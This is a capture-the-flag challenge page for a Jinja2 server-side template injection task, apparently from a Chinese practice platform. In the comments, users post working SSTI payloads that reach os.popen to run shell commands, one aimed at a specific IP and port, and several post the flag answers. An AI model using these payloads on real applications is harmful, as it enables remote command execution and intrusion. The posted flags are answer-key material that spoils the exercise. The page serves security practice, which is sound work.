Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16470
提  示:
描  述:
Simple_SSTI_2
评论
不会写代码的菜鸟 1年前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 1年前

因为没有import os,os是未定义的

回复 5

q1152874733 1年前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 1

Royic 1年前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 1年前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 1年前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

109349 1年前

flag{2682096b09e88fe5f1faee731c0d36d7}

回复 0

z0shell 1年前

/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

回复 0
Masterk 1年前

这是怎么想出来的。。

回复 2

ABUDUWILI 1年前

flag{ffb1bde14170624274f424caf4406a1a}

回复 0

L.. 1年前

SSTI模版注入:?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},拓展?flag={{config.__class__.__init__.__globals__['os'].popen('cat../app/flag').read()}}

回复 0

qiqiguren 2年前

题解详细步骤:http://t.csdnimg.cn/yZlnn

回复 10
18476760376 1年前

好用,谢谢

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

shu-jia 攻破了该题 1天前
avaclaire 攻破了该题 2天前
cha8e1 攻破了该题 3天前
yehlg 攻破了该题 4天前
edisonya 攻破了该题 5天前
finsh 攻破了该题 5天前
pangjinqi 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
wujita01 攻破了该题 6天前
Hackerchen 攻破了该题 7天前
影人sha 攻破了该题 7天前
drameet 攻破了该题 7天前
Hoshisyy 攻破了该题 11天前
SuperFan 攻破了该题 11天前
ikunqq 攻破了该题 12天前
十里故清云 攻破了该题 13天前
0n1y 攻破了该题 14天前
bugku2026 攻破了该题 15天前
kr2yh 攻破了该题 15天前
kitniu 攻破了该题 15天前
问题反馈